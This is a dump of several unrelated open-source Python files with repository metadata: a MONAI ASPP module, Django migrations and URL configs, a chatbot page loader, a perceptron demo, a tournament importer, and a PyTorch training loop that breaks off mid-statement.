# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
from monai.networks.blocks.convolutions import Convolution
from monai.networks.layers import same_padding
from monai.networks.layers.factories import Act, Conv, Norm
class SimpleASPP(nn.Module):
    """
    A simplified version of the atrous spatial pyramid pooling (ASPP) module.
    Chen et al., Encoder-Decoder with Atrous Separable Convolution for Semantic Image Segmentation.
    https://arxiv.org/abs/1802.02611
    Wang et al., A Noise-robust Framework for Automatic Segmentation of COVID-19 Pneumonia Lesions
    from CT Images. https://ieeexplore.ieee.org/document/9109297
    """
    def __init__(
        self,
        spatial_dims: int,
        in_channels: int,
        conv_out_channels: int,
        kernel_sizes=(1, 3, 3, 3),
        dilations=(1, 2, 4, 6),
        norm_type=Norm.BATCH,
        acti_type=Act.LEAKYRELU,
    ):
        """
        Args:
            spatial_dims: number of spatial dimensions, could be 1, 2, or 3.
            in_channels: number of input channels.
            conv_out_channels: number of output channels of each atrous conv.
                The final number of output channels is conv_out_channels * len(kernel_sizes).
            kernel_sizes: a sequence of four convolutional kernel sizes.
                Defaults to (1, 3, 3, 3) for four (dilated) convolutions.
            dilations: a sequence of four convolutional dilation parameters.
                Defaults to (1, 2, 4, 6) for four (dilated) convolutions.
            norm_type: final kernel-size-one convolution normalization type.
                Defaults to batch norm.
            acti_type: final kernel-size-one convolution activation type.
                Defaults to leaky ReLU.
        Raises:
            ValueError: len(kernel_sizes) and len(dilations) must be the same.
        """
        super().__init__()
        if len(kernel_sizes) != len(dilations):
            raise ValueError("len(kernel_sizes) and len(dilations) must be the same.")
        # "same" padding per (kernel, dilation) pair keeps every branch's
        # spatial output size equal so the branch outputs can be concatenated.
        pads = tuple(same_padding(k, d) for k, d in zip(kernel_sizes, dilations))
        # One parallel (dilated) convolution branch per kernel/dilation pair.
        self.convs = nn.ModuleList()
        for k, d, p in zip(kernel_sizes, dilations, pads):
            _conv = Conv[Conv.CONV, spatial_dims](
                in_channels=in_channels, out_channels=conv_out_channels, kernel_size=k, dilation=d, padding=p
            )
            self.convs.append(_conv)
        out_channels = conv_out_channels * len(pads)  # final conv. output channels
        # Kernel-size-1 convolution (+ norm + activation) that fuses the
        # concatenated branch outputs without changing the channel count.
        self.conv_k1 = Convolution(
            dimensions=spatial_dims,
            in_channels=out_channels,
            out_channels=out_channels,
            kernel_size=1,
            act=acti_type,
            norm=norm_type,
        )
    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """
        Args:
            x: in shape (batch, channel, spatial_1[, spatial_2, ...]).
        """
        # Run every atrous branch on the same input, concatenate along the
        # channel axis, then fuse with the kernel-size-1 convolution.
        x_out = torch.cat([conv(x) for conv in self.convs], dim=1)
        x_out = self.conv_k1(x_out)
        return x_out
| [
"noreply@github.com"
] | noreply@github.com |
df977b7393b24ca1ad477917ec83da57172a7542 | 2e395913f297389e8afdc99738b5ee7f6af20bb7 | /django project/New folder/myproj/myapp/migrations/0003_auto_20200620_1052.py | 06c507915d2fccd0d061928827ae0dcafb3133d7 | [] | no_license | Jagdar/demo_napp | 4089bcfabd27689e6463eebbc40def6cf257599e | c1c42d7c3fa68a67c4e84cf622a3892f9bbed711 | refs/heads/master | 2022-11-16T16:03:41.591506 | 2020-07-16T04:36:54 | 2020-07-16T04:36:54 | 266,512,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 562 | py | # Generated by Django 3.0.7 on 2020-06-20 17:52
from django.db import migrations, models
class Migration(migrations.Migration):
    """Rename ``qaa.questions`` to ``question`` and constrain ``qaa.lang``
    to a one-letter choice set (java/python/C).  Auto-generated."""
    dependencies = [
        ('myapp', '0002_qaa'),
    ]
    operations = [
        migrations.RenameField(
            model_name='qaa',
            old_name='questions',
            new_name='question',
        ),
        migrations.AlterField(
            model_name='qaa',
            name='lang',
            field=models.CharField(choices=[('j', 'java'), ('p', 'python'), ('c', 'C prog')], max_length=1),
        ),
    ]
| [
"65850358+Jagdar@users.noreply.github.com"
] | 65850358+Jagdar@users.noreply.github.com |
46c35a9237b2d46b850eca504e33651a556162ee | b7e7f7fd6150b5bb9237929bacb0ead18fac46bc | /Mechanics/PagesManager.py | f652e39fd3582e82882b6d7ede84424b5bb4c27f | [] | no_license | babochkin-prod/FindCall | 18e9d02a5039335132e71d56489409d189536ec6 | beaae5fe5aa12f360dde744d78edc9d4599eebbd | refs/heads/main | 2023-03-31T02:30:52.532327 | 2021-04-05T18:22:21 | 2021-04-05T18:22:21 | 352,095,495 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,840 | py | import json
import os
from DATABASE import sqlighter
from Settings import *
#Импорт страниц
'''
Разметка клавиатуры
{'inline': [[], []], 'keyboard': [[{'text': 'text', 'color': 'negative'},], []]}
'''
pages = {}
def Pages_Connect(path, delimiter = '\\'):
    """Recursively import every page module under *path* and register an
    instance of each page class in the module-level ``pages`` dict.

    Each page file is expected to define a class named like the file itself;
    ``__pycache__`` and ``STANDART.py`` are skipped.  Imports are performed
    via exec() on generated "from ... import ..." statements, so page files
    must be importable from the process working directory.
    """
    for file_name in os.listdir(path):
        # Turn the filesystem path into a dotted import path.
        str_import_from = path.replace('{}'.format(delimiter), '.').replace('..', '.')
        if(str_import_from[-1] == '.'):
            str_import_from = str_import_from[0: -1]
        if(file_name != '__pycache__') and (file_name != 'STANDART.py'):
            file=os.path.join(path,file_name)
            # If this entry is a package directory: import it and recurse.
            if os.path.isdir(file):
                com = 'from {} import {}'.format(str_import_from, file_name)
                exec(com)
                Pages_Connect('{}{}{}'.format(path, delimiter, file_name))
            # Otherwise it is a file.
            else:
                if(file_name[-3:] == '.py'):
                    file_name = file_name[:-3]
                    # Import the page module.
                    com = 'from {} import {}'.format(str_import_from, file_name)
                    exec(com)
                    # Register a page instance under its pageName key.
                    com = 'pages.update({1} {0}.{0}().pageName: {0}.{0}() {2})'.format(file_name, '{', '}')
                    exec(com)
# Автоматическое подключение страниц
delimiter = '\\'
path = 'Pages{}'.format(delimiter)
print('Start loading pages...')
Pages_Connect(path, delimiter)
print('Pages loaded.')
# Сообщения при старте бота
def start_messages():
    """Build the bot's greeting payloads, one per entry in START_MESSAGES
    (imported from Settings).

    Each payload is {'type': '-', 'text': <message>, 'media': []}.
    """
    # Cleanup: the previous version kept an unused local ``page`` and built
    # the list with a manual append loop.
    return [{'type': '-', 'text': text, 'media': []} for text in START_MESSAGES]
#------------------------------------- Выборка страницы -------------------------------------
def Keyboard_keyboards(app_from, page, user_id):
    """Return the keyboard layout that *page* builds for the given user."""
    return pages[page].Keyboard(app_from, user_id)
#--------------------------------------------------------------------------------------------
#------------------------------------- Обработчик нажатий -------------------------------------
def Keyboard_Events(app_from, page, user_id, data):
    """Dispatch a button press / text command *data* to the current *page*
    and return the page list to show next.
    """
    p_ = [page]
    # Panic commands ("HELP ME" in Russian, or the SOS emoji) reset the
    # user's stored data and return them to the main page.  These literals
    # must match what users actually type -- do not translate them.
    if(data == 'ПОМОГИ') or (data == '🆘'):
        sqlighter.set_user_data(app_from = app_from, user_id = user_id, line = 'data', data = '')
        return ['main']
    # Unknown page (e.g. removed by a deploy): fall back to the default
    # page and persist that choice for the user.
    if not(page in pages):
        page = STANDART_PAGE
        sqlighter.set_data(table_name = 'users', line = 'page', line_selector = 'user_id_{}'.format(app_from), line_selector_value = user_id, data = page)
    p_ = pages[page].Keyboard_Events(app_from, user_id, data)
    # A page returning '-' means "no navigation": re-render the same page.
    if(p_ == '-'):
        p_ = pages[page].Ansver(app_from, user_id)
    return p_
#----------------------------------------------------------------------------------------------
#------------------------------------- Ответ -------------------------------------
def Keyboard_Ansver(page, app_from, user_id):
    """Return the answer payload produced by *page* for this user."""
    return pages[page].Ansver(app_from, user_id)
#---------------------------------------------------------------------------------
#------------------------------------ Медиосообщение ------------------------------------
def Media_Message(app_from, user_id, page, media_data):
    """Forward an incoming media attachment to the current page's handler.

    Falls back to staying on *page* when the handler is missing or raises;
    a handler returning '-' also means "stay on the current page".
    """
    p_ = [page]
    try:
        p_ = pages[page].Media_Message(app_from, user_id, media_data)
    except Exception as e:
        # Pages are not required to implement Media_Message; log and stay put.
        print(e)
    if(p_ != '-'):
        return p_
    else:
        return [page]
#----------------------------------------------------------------------------------------
#------------------------------------ Аудиосообщение ------------------------------------
def Audio_Message(app_from, user_id, page, audio_data):
    """Forward an incoming voice message to the current page's handler.

    Falls back to staying on *page* when the handler is missing or raises;
    a handler returning '-' also means "stay on the current page".
    """
    p_ = [page]
    try:
        p_ = pages[page].Audio_Message(app_from, user_id, audio_data)
    except Exception as e:
        # Consistency fix: log the failure like Media_Message does instead
        # of swallowing it silently with ``pass``.
        print(e)
    if(p_ != '-'):
        return p_
    else:
        return [page]
#---------------------------------------------------------------------------------------- | [
"68076247+babochkin-prod@users.noreply.github.com"
] | 68076247+babochkin-prod@users.noreply.github.com |
d42bf811b38b3d684e023ba06091ebcf353addd5 | 9751db1d14ef58a58c54f97721d67431a5b067a8 | /DLFCV/perceptron_or.py | 58b5c29478685e455f8130062daab80cba5f1fbe | [] | no_license | ken2190/ProgramPractice | fad67aff7874239d88e64129cbfb23e42892d6e7 | 31a7e8ddbbc81bb7712cbc1e9dd17da3c278db84 | refs/heads/master | 2023-03-23T02:14:59.775412 | 2019-08-28T06:27:48 | 2019-08-28T06:27:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | #
# Fit Perceptron model to the bitwise OR dataset
# a: zhonghy
# date: 2018-7-19
#
# import the necessary packages
from pyimagesearch.nn.perceptron import Perceptron
import numpy as np
# construct the OR dataset
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
y = np.array([[0], [1], [1], [1]])  # OR truth table: 0 only for input (0, 0)
# define our perceptron and train it
print("[INFO] training perceptron...")
p = Perceptron(X.shape[1], alpha=0.1)
p.fit(X, y, epochs=20)
# now that our perceptron is trained we can evaluate it
# (the "preceptron" typo below is inside the printed string; left as-is)
print("[INFO] testing preceptron...")
# now that our network is trained, loop over the data points
for (x, target) in zip(X, y):
    # make a prediction on the data point and display the result
    # to our console
    pred = p.predict(x)
    print("[INFO] data={}, ground-truth={}, pred={}".format(
        x, target[0], pred))
| [
"530634028@qq.com"
] | 530634028@qq.com |
8640a9beee2db350e17734b1c6aea157fd54d3dc | a91053e849189be233e774b3d410a0fc85b570f3 | /project/urls.py | d019359613cb7fe73fa6c5b98e4e447df685f431 | [] | no_license | AnthonyDeniau/biller | 3496a90050cf05ca5e43b483a314bd136bc7c913 | 8d471df5b23f839bb0ea37396f4586463643424f | refs/heads/master | 2020-04-01T16:50:25.771063 | 2018-10-18T06:10:29 | 2018-10-18T06:10:29 | 153,400,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | """biller URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"anthony.deniau@gmail.com"
] | anthony.deniau@gmail.com |
12df0fae41407a4524a513b2dbd44b58de10142c | 00593fc129ee9443e9456a4c6dd194bd53474ed6 | /few-shot/models.py | e75b217c91fec649939280ad83602375701e85e8 | [
"MIT"
] | permissive | cititude/Media-and-Cognition-Homework | 3b7217f9c0fe4c45309ac25baa7aec1e17e90234 | dabaaef6d8ec115171e7115731c5f76b518d9bde | refs/heads/master | 2022-11-20T10:34:51.120231 | 2020-06-27T13:54:36 | 2020-06-27T13:54:36 | 252,416,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,719 | py | import torch
from torch import nn
from torch.autograd import Variable
from sedense import *
class Reptile(nn.Module):
    """Base module implementing the Reptile meta-update gradient trick.

    ``point_grad_to`` writes the parameter-wise difference (self - target)
    into each parameter's ``.grad``, so a subsequent optimizer step moves
    this model's weights toward *target*'s weights.
    """
    def __init__(self):
        nn.Module.__init__(self)
    def point_grad_to(self, target):
        '''
        Set .grad attribute of each parameter to be proportional
        to the difference between self and target
        '''
        for p, target_p in zip(self.parameters(), target.parameters()):
            if p.grad is None:
                # torch.zeros_like matches p's dtype AND device, replacing
                # the old deprecated Variable(...) wrapper and the manual
                # per-parameter .cuda() branching.
                p.grad = torch.zeros_like(p)
            # Accumulate into any existing grad (same as the original).
            p.grad.data.add_(p.data - target_p.data)
    def is_cuda(self):
        # Probes the first parameter; raises StopIteration on a module
        # without parameters (unchanged behavior).
        return next(self.parameters()).is_cuda
class Meta_Model(Reptile):
    """Reptile-trainable classifier wrapping an SEDenseNet backbone.

    Inputs are reshaped to (batch, 3, 224, 224) before classification --
    assumes the data loader supplies 3x224x224 images; TODO confirm.
    """
    def __init__(self, num_classes=11):
        Reptile.__init__(self)
        self.num_classes = num_classes
        self.classifier=SEDenseNet(num_classes=num_classes)
    def forward(self, x):
        # Collapse any leading dimensions into the batch dimension.
        out = x.view(-1, 3, 224, 224)
        out = self.classifier(out)
        return out
    def predict(self, prob):
        # Return the argmax class index per row (works on logits or probs).
        __, argmax = prob.max(1)
        return argmax
    def clone(self):
        # Deep copy with identical weights (and device) for inner-loop steps.
        clone = Meta_Model(self.num_classes)
        clone.load_state_dict(self.state_dict())
        if self.is_cuda():
            clone.cuda()
        return clone
    def load_pretrained_state_dict(self,pretrained_state_dict):
        # Copy matching backbone weights, skipping any key that contains
        # "classifier" so the final FC layer keeps its fresh initialization.
        self_state_dict=self.classifier.state_dict()
        pretrained_state_dict={k:v for k,v in pretrained_state_dict.items() if (k in self_state_dict and "classifier" not in k)}
        self_state_dict.update(pretrained_state_dict)
        self.classifier.load_state_dict(self_state_dict)
| [
"3223781449@qq.com"
] | 3223781449@qq.com |
83be0eb13d11e962804f49073a705f18cebb52b5 | e242ccd5bab549776d15a94f94603f605039afac | /myEvent/urls.py | e0ff65aa84705c24c27b8a91fb84ae99e3c54144 | [] | no_license | jose-carrasco/django_weeding_template | 85e8e57fc051d6c84cc9ca4c2ef50d74a0d784a6 | 32f8a1c3e08919860216a8a79fa28678256e6c0f | refs/heads/master | 2023-03-03T12:59:08.373100 | 2015-04-16T17:55:47 | 2015-04-16T17:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | # -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
from myEvent import views
# Legacy Django (<1.10) URL configuration for the wedding-site pages.
urlpatterns = patterns('',
    url(r'^$', views.index, name='index'),
    url(r'^hoteles', views.hotels, name='hotels'),
    url(r'^mesa_de_regalos', views.giftstable, name='giftstable'),
    url(r'^confirmacion', views.confirm, name='confirm'),
    url(r'^comparte_tus_fotos', views.photos, name='photos'),
    url(r'^register', views.register, name='register'),
) | [
"jcarrasco@digitalartsnetwork.com.mx"
] | jcarrasco@digitalartsnetwork.com.mx |
ff7332969d1eb61a67b9706650a536ba16ef14a4 | 14198fd6549fe8d9d420bcd4d0730535c3dfbe7e | /prac_08/taxi_simulator.py | 545faa6c7f5c2086966830b124059dc47f85cfbc | [] | no_license | IoAdhitama/CP1404 | b8336df5f9633dc5d09125817577210d23172a0b | afe1d62b5f8cb1da68387796449fa62bc2f55783 | refs/heads/master | 2020-04-07T11:20:38.134203 | 2018-12-29T03:20:16 | 2018-12-29T03:20:16 | 158,322,158 | 0 | 0 | null | 2018-12-11T03:41:17 | 2018-11-20T02:54:36 | Python | UTF-8 | Python | false | false | 1,404 | py | from prac_08.taxi import Taxi
from prac_08.silver_service_taxi import SilverServiceTaxi
MENU = """q)uit, c)hoose taxi, d)rive
>>> """
def main():
    """Console taxi simulator: choose a taxi, drive it, accumulate a bill.

    Fare logic lives in the prac_08 Taxi / SilverServiceTaxi classes.
    """
    user_input = ""
    taxi_used = 0  # index into taxis; stays 0 if "d" is chosen before "c"
    current_bill = 0
    taxis = [Taxi("Prius", 100), SilverServiceTaxi("Limo", 100, 2),
             SilverServiceTaxi("Hummer", 200, 4)]
    print("Let's Drive!")
    while user_input != "q":
        user_input = str(input(MENU)).lower()
        if user_input == "c":
            print("Taxis available:")
            for i in range(len(taxis)):
                print("{} - {}".format(i, taxis[i]))
            try:
                taxi_used = int(input("Choose taxi: "))
                # NOTE(review): no range check -- an out-of-range index
                # raises IndexError here, which the ValueError handler
                # below does not catch.
                taxis[taxi_used].start_fare()
            except ValueError:
                print("Invalid input.")
        if user_input == "d":
            try:
                distance = int(input("Drive how far? "))
                taxis[taxi_used].drive(distance)
                print("Your {} trip cost you ${}".format(taxis[taxi_used].name, taxis[taxi_used].get_fare()))
                # assumes get_fare() covers only the fare since the last
                # start_fare()/drive -- if it is cumulative, repeated drives
                # would double-count here; confirm against the Taxi class.
                current_bill += taxis[taxi_used].get_fare()
            except ValueError:
                print("Invalid input.")
        print("Bill to date: ${}".format(current_bill))
    print("Total trip cost: ${}".format(current_bill))
    print("Taxis are now:")
    for i in range(len(taxis)):
        print("{} - {}".format(i, taxis[i]))
main()
"spicyicedtea@gmail.com"
] | spicyicedtea@gmail.com |
69c0bb652daa62eea8c9a6a5378fd562629cf26a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03095/s108733747.py | 8493da82e83df4f2a53a5e799e1313b9f63c0471 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,818 | py | import sys
import math
from collections import Counter
N = int(input())  # length of S; read but unused below (len(S) would do)
S = input()
MOD = 1000000007
# The original author's Japanese working notes are condensed here.
# `ans` is built incrementally over the prefix of S, modulo 1e9+7.
# Invariant (verified against the worked examples "baba"/"baab" -> 8):
# after processing a prefix, ans = prod(1 + count(c)) - 1 over the distinct
# characters c seen so far, i.e. the number of non-empty selections taking
# at most one occurrence of each character.
# - Unseen character ch: every existing selection can take ch or not, plus
#   the selection {ch} alone  ->  ans = 2*ans + 1.
# - Repeated character ch: only selections using this NEW occurrence of ch
#   are new; each combines ch with any sub-selection of the OTHER
#   characters  ->  ans += prod over k != ch of (1 + count(k)).
ans = 1
counter = Counter()
counter[S[0]] += 1
for ch in S[1:]:
    if ch in counter:
        # repeated character: count selections pairing this occurrence of
        # ch with any sub-selection of the other characters seen so far
        tmp = 1
        for k, cnt in counter.items():
            if k == ch:
                continue
            tmp = (tmp * (1 + cnt)) % MOD
        ans = (ans + tmp) % MOD
        counter[ch] += 1
    else:
        # unseen character: double the possibilities and add {ch} itself
        ans = (2 * ans) % MOD
        ans = (ans + 1) % MOD
        counter[ch] += 1
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
1b8cebda853f471998deaecde0f755376fac2db7 | bb0a9ad70e17dc7b2f623f82b74030c1d73a8a82 | /hello/urls.py | 965cc5efa92fb2ccfef64da01659c5a3479b74cd | [] | no_license | 28kayak/django_tutorial_app | 00d6f8321376163bc2591dff114cafe8d9b6e2b4 | 28f5cf5c2dbaae4928f6cce948b8fe8e886b7999 | refs/heads/master | 2020-03-22T07:19:00.906056 | 2018-07-08T10:44:20 | 2018-07-08T10:44:20 | 139,692,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | from django.urls import path
from . import views
urlpatterns = [
    # Earlier experiments kept for reference:
    #path("", views.index, name="index"),
    #path('<int:id>/<nickname>/',views.index, name='index'),
    path('', views.index, name='index'), #path used by index.html in templates
    path('next', views.next, name='next'),
    path('form', views.form, name='form'),
] | [
"kaya.ota@gmail.com"
] | kaya.ota@gmail.com |
47bf2f00c6730182259d81aeab1bf82ce408ef5d | c7115a0a1470310792b81cd097e0aa47ed095195 | /django_thoughtapi/manage.py | 5045eb05410e0449491ad1e7a92edec2a1f3c746 | [
"MIT"
] | permissive | qwergram/thoughts_api | 80818424b3755f671cfb65fcddff5c0769fa9e27 | 47e9a76cc15e30c36232b253eb0e44bb5f401482 | refs/heads/master | 2020-12-24T22:29:12.401158 | 2016-04-30T22:45:20 | 2016-04-30T22:45:20 | 57,338,528 | 0 | 0 | null | 2016-04-29T23:40:38 | 2016-04-28T22:46:59 | null | UTF-8 | Python | false | false | 260 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Standard Django management entry point: point Django at this
    # project's settings module, then hand argv to the CLI dispatcher.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_thoughtapi.settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| [
"npengra317@gmail.com"
] | npengra317@gmail.com |
16d15c7c403e947cd7224a3ad6d98ea06966c65b | 3ccb61cf50e5d4c3263ae7e29d89ca4d2e761a5c | /command/refresh.py | 8167b6dc02f737f6b370e2e0745d1f08970b0ece | [] | no_license | K2Da/fgbuff | 6f29380276e90ddee35ed2734561cd53e05deb19 | d31e8423eebc763d2095d01e05b9adb1bef04c35 | refs/heads/master | 2021-01-11T03:20:08.170758 | 2017-03-04T12:31:29 | 2017-03-04T12:31:29 | 71,048,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,792 | py | import challonge
import config
from command.smash import SmashLoader
from database.common import Table
challonge.set_credentials(config.challonge_id, config.challonge_api_key)
ft = Table('fg_tournament')
# Re-import every tournament flagged for refresh, then clear the flag.
for row in ft.select('refresh = %s', (True, )):
    if row['source'] == 'smash':
        l = SmashLoader(row)
        l.import_data()
    else:
        # Challonge-backed tournament: wipe and re-insert its participants,
        # matches and groups from the Challonge API.
        t = challonge.tournaments.show(row['challo_url'])
        cp = Table('challo_participant')
        cp.delete('tournament_id = %s', (row['id'],))
        participants = []
        for p in challonge.participants.index(t['id']):
            participants.append(p['id'])
            cp.insert_with_array([p['id'], row['id'], p['name'], p['final-rank']])
        cm = Table('challo_match')
        cm.delete('tournament_id = %s', (row['id'],))
        groups = {}  # group_id -> (min round, max round)
        matches = challonge.matches.index(t['id'])
        # Group-stage matches reference per-group player ids that differ
        # from the tournament-wide participant ids; collect those here.
        ids = []
        for m in matches:
            p1 = m['player1-id']
            p2 = m['player2-id']
            if p1 and p1 not in ids and p1 not in participants:
                ids.append(p1)
            if p2 and p2 not in ids and p2 not in participants:
                ids.append(p2)
        # NOTE(review): group-stage ids are mapped onto participant ids
        # purely by sort order -- this assumes Challonge assigns both id
        # ranges in the same order; confirm that assumption still holds.
        id_dictionary = dict(zip(sorted(ids), sorted(participants)))
        for m in matches:
            p1 = m['player1-id']
            p2 = m['player2-id']
            winner = m['winner-id']
            group_id = m['group-id'] if m['group-id'] is not None else 0
            r = m['round']
            # Track each group's observed round range.
            if group_id not in groups:
                groups[group_id] = (r, r)
            if r < groups[group_id][0]:
                groups[group_id] = (r, groups[group_id][1])
            if r > groups[group_id][1]:
                groups[group_id] = (groups[group_id][0], r)
            # Translate group-stage ids to tournament-wide participant ids.
            if p1 in id_dictionary:
                p1 = id_dictionary[p1]
            if p2 in id_dictionary:
                p2 = id_dictionary[p2]
            if winner in id_dictionary:
                winner = id_dictionary[winner]
            # Only store completed matches (positive winner id).
            if winner is not None and int(winner) > 0:
                cm.insert_with_array([
                    m['id'], row['id'], m['round'], p1, p2, winner, m['scores-csv'], group_id
                ])
        cg = Table('challo_group')
        cg.delete('tournament_id = %s', (row['id'],))
        i = 65  # ord('A'): group-stage pools are named Group A, Group B, ...
        for group_id, rounds in groups.items():
            if group_id == 0:
                name = 'Main Tournament'
            else:
                name = 'Group {0}'.format(chr(i))
                i += 1
            cg.insert_with_array([group_id if group_id is not None else 0, row['id'], rounds[0], rounds[1], name, 'DE'])
        ft.update(row['id'], [('refresh', False), ('challo_id', t['id'])])
"id.k2da@gmail.com"
] | id.k2da@gmail.com |
d0e4986d309250758c538a7565a37d494c0409a0 | e2df45a8594c5eb61aeda00cef07bb07b3bbec77 | /Gaussian_Naive_Bayes/read_data.py | 4e1faf755ae286f3a4acfbb98cf94fcfe1fe607a | [] | no_license | rathodx/Machine-Learning-from-Scratch | 8ccd67eb62320f5e235ba51e5d3e2c37e7465733 | 1f92d18fe7d73e8c95a3322dddbb5c6782ea1cf6 | refs/heads/master | 2021-01-01T14:21:41.452199 | 2019-05-21T06:44:07 | 2019-05-21T06:44:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | import numpy as np
import h5py
def read_data(path):
    """Load features X and labels Y from an HDF5 file.

    The file must contain datasets named 'X' and 'Y'.  X is converted to
    float64 and normalized to [0, 1] by dividing by its global maximum.

    Parameters:
        path: filesystem path to the HDF5 file.

    Returns:
        (X, Y) tuple of numpy arrays.
    """
    # Use a context manager so the HDF5 handle is always closed (the
    # previous version leaked it), and open read-only explicitly.
    with h5py.File(path, 'r') as f:
        X = np.array(f['X'], dtype='float64')
        Y = np.array(f['Y'])
    X = X / np.max(X)
    return X, Y
| [
"noreply@github.com"
] | noreply@github.com |
b674a0c5eebdf78362e1b76edcf44e210e286358 | a114b9b82ba5550d6c2b662d2c2594ee2772b6a8 | /train.py | 0487403b3b1055d5603c5c573dd008594360acf4 | [] | no_license | letter5j/wounds-image-classification | 78db45fbdd158f4e4ffa71d785a77e941f98205f | 4230b0ba3e6108a60f9e2a0a9842680deb828f29 | refs/heads/master | 2020-04-01T13:31:44.823423 | 2018-10-16T09:08:57 | 2018-10-16T09:08:57 | 153,256,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,984 | py | import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
from torch.autograd import Variable
import visdom
from get_data import get_data_loaders
import numpy as np
import time
import copy
import os
def train_model(model, criterion, optimizer, scheduler, num_epochs, dataloaders, dataset_sizes):
    """Train `model` for `num_epochs` epochs over the 'train'/'test' dataloaders.

    Logs per-epoch loss/accuracy to stdout, to result/<model.name>.txt, and to
    live visdom line plots. Returns the model loaded with the weights that
    achieved the best test accuracy.
    """
    # Results file is closed explicitly at the end of training (not a `with`
    # block, because it stays open across the whole epoch loop).
    PATH = os.path.abspath(os.path.dirname(__file__))
    result_file = open(os.path.join(PATH, 'result', '%s.txt' % (model.name)), 'w+')
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    viz = visdom.Visdom()
    # Line plots for monitoring accuracy and loss; seeded with dummy data,
    # overwritten in-place (win=...) every epoch.
    accuracy_line = viz.line(X=np.arange(1, 10, 1), Y=np.arange(1, 10, 1))
    # Line plot for monitoring loss.
    loss_line = viz.line(X=np.arange(1, 10, 1), Y=np.arange(1, 10, 1))
    # Accumulated per-epoch points: *_t lists hold the 'test' phase values.
    time_point, loss_point, accuracy_point = [], [], []
    time_point_t, loss_point_t, accuracy_point_t = [], [], []
    since = time.time()
    best_model_wts = copy.deepcopy(model.state_dict())
    best_acc = 0.0
    for epoch in range(num_epochs):
        print('Epoch {}/{}'.format(epoch, num_epochs - 1))
        print('-' * 10)
        result_file.writelines('Epoch {}/{}\n'.format(epoch, num_epochs - 1))
        result_file.writelines('-' * 10 + '\n')
        # Each epoch has a training and a validation ('test') phase.
        for phase in ['train', 'test']:
            if phase == 'train':
                scheduler.step()
                model.train()  # Set model to training mode
            else:
                model.eval()  # Set model to evaluate mode
            running_loss = 0.0
            running_corrects = 0
            # Iterate over data.
            for inputs, labels in dataloaders[phase]:
                inputs = inputs.to(device)
                labels = labels.to(device)
                # Zero the parameter gradients.
                optimizer.zero_grad()
                # Forward pass; track gradient history only while training.
                with torch.set_grad_enabled(phase == 'train'):
                    outputs = model(inputs)
                    _, preds = torch.max(outputs, 1)
                    loss = criterion(outputs, labels)
                    # Backward + optimize only in the training phase.
                    if phase == 'train':
                        loss.backward()
                        optimizer.step()
                # Statistics: un-average the batch loss (loss.item() is a mean).
                running_loss += loss.item() * inputs.size(0)
                running_corrects += torch.sum(preds == labels.data)
            epoch_loss = running_loss / dataset_sizes[phase]
            epoch_acc = running_corrects.double() / dataset_sizes[phase]
            print('{} Loss: {:.4f} Acc: {:.4f}'.format(
                phase, epoch_loss, epoch_acc))
            result_file.writelines('{} Loss: {:.4f} Acc: {:.4f}\n'.format(
                phase, epoch_loss, epoch_acc))
            if phase == 'train':
                time_point.append(epoch)
                loss_point.append(epoch_loss)
                accuracy_point.append(epoch_acc)
            if phase == 'test':
                time_point_t.append(epoch)
                loss_point_t.append(epoch_loss)
                accuracy_point_t.append(epoch_acc)
            # Keep the best weights seen so far (deep copy of the model).
            if phase == 'test' and epoch_acc > best_acc:
                best_acc = epoch_acc
                best_model_wts = copy.deepcopy(model.state_dict())
        # Redraw both visdom plots once per epoch with the accumulated history.
        viz.line(X=np.column_stack((np.array(time_point), np.array(time_point_t))),
                 Y=np.column_stack((np.array(accuracy_point), np.array(accuracy_point_t))),
                 win=accuracy_line,
                 opts=dict(title='%s-ac' % (model.name), legend=["accuracy", "test_accuracy"]))
        viz.line(X=np.column_stack((np.array(time_point), np.array(time_point_t))),
                 Y=np.column_stack((np.array(loss_point), np.array(loss_point_t))),
                 win=loss_line,
                 opts=dict(title='%s-loss' % (model.name), legend=["loss", "test_loss"]))
    time_elapsed = time.time() - since
    print('Training complete in {:.0f}m {:.0f}s'.format(
        time_elapsed // 60, time_elapsed % 60))
    print('Best val Acc: {:4f}'.format(best_acc))
    result_file.writelines('Training complete in {:.0f}m {:.0f}s\n'.format(
